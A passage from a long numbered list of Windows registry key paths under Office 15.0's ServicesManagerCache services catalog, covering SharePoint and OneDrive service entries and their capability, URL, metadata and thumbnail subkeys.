865. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceUrl",
866. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata",
867. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\KeyTip",
868. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\Type",
869. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails",
870. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url16x16",
871. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url32x32",
872. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url48x48",
873. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP",
874. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Capabilities",
875. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ConnectMechanism",
876. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsManaged",
877. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsRemovable",
878. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceOwner",
879. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SortOrder",
880. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SupportsMultiple",
881. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\CapabilitiesMetadata",
882. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Description",
883. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Name",
884. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceId",
885. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceUrl",
886. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata",
887. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\KeyTip",
888. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\Type",
889. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails",
890. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
891. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
892. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
893. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT",
894. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Capabilities",
895. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ConnectMechanism",
896. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsManaged",
897. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsRemovable",
898. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceOwner",
899. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SortOrder",
900. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SupportsMultiple",
901. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\CapabilitiesMetadata",
902. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Description",
903. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Name",
904. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceId",
905. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceUrl",
906. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata",
907. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\KeyTip",
908. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\Type",
909. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails",
910. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url16x16",
911. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url32x32",
912. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url48x48",
913. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP",
914. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Capabilities",
915. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ConnectMechanism",
916. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsManaged",
917. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsRemovable",
918. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceOwner",
919. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SortOrder",
920. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SupportsMultiple",
921. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\CapabilitiesMetadata",
922. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Description",
923. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Name",
924. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceId",
925. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceUrl",
926. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata",
927. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\KeyTip",
928. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\Type",
929. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails",
930. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
931. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
932. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
933. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED",
934. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Capabilities",
935. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ConnectMechanism",
936. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsManaged",
937. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsRemovable",
938. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceOwner",
939. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SortOrder",
940. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SupportsMultiple",
941. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\CapabilitiesMetadata",
942. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Description",
943. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Name",
944. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceId",
945. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceUrl",
946. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata",
947. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\KeyTip",
948. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\Type",
949. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT",
950. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Capabilities",
951. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ConnectMechanism",
952. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsManaged",
953. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsRemovable",
954. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceOwner",
955. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SortOrder",
956. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SupportsMultiple",
957. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\CapabilitiesMetadata",
958. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Description",
959. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Name",
960. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceId",
961. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceUrl",
962. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata",
963. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\DefaultFolderRelativePath",
964. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\KeyTip",
965. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\Type",
966. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails",
967. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url16x16",
968. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url32x32",
969. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url48x48",
970. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP",
971. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Capabilities",
972. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ConnectMechanism",
973. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsManaged",
974. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsRemovable",
975. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceOwner",
976. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SortOrder",
977. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SupportsMultiple",
978. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\CapabilitiesMetadata",
979. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Description",
980. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Name",
981. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceId",
982. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceUrl",
983. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata",
984. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\KeyTip",
985. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\Type",
986. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails",
987. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
988. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
989. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
990. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER",
991. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Capabilities",
992. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ConnectMechanism",
993. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsManaged",
994. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsRemovable",
995. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceOwner",
996. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SortOrder",
997. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SupportsMultiple",
998. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\CapabilitiesMetadata",
999. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Description",
1000. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Name",
1001. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceId",
1002. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceUrl",
1003. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata",
1004. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\HideIfEmpty",
1005. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\KeyTip",
1006. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\Type",
1007. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails",
1008. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url16x16",
1009. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url32x32",
1010. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url48x48",
1011. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE",
1012. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Capabilities",
1013. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ConnectMechanism",
1014. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsManaged",
1015. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsRemovable",
1016. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceOwner",
1017. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SortOrder",
1018. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SupportsMultiple",
1019. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\CapabilitiesMetadata",
1020. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Description",
1021. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Name",
1022. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceId",
1023. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceUrl",
1024. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata",
1025. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
1026. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
1027. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\KeyTip",
1028. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\RegularExpression",
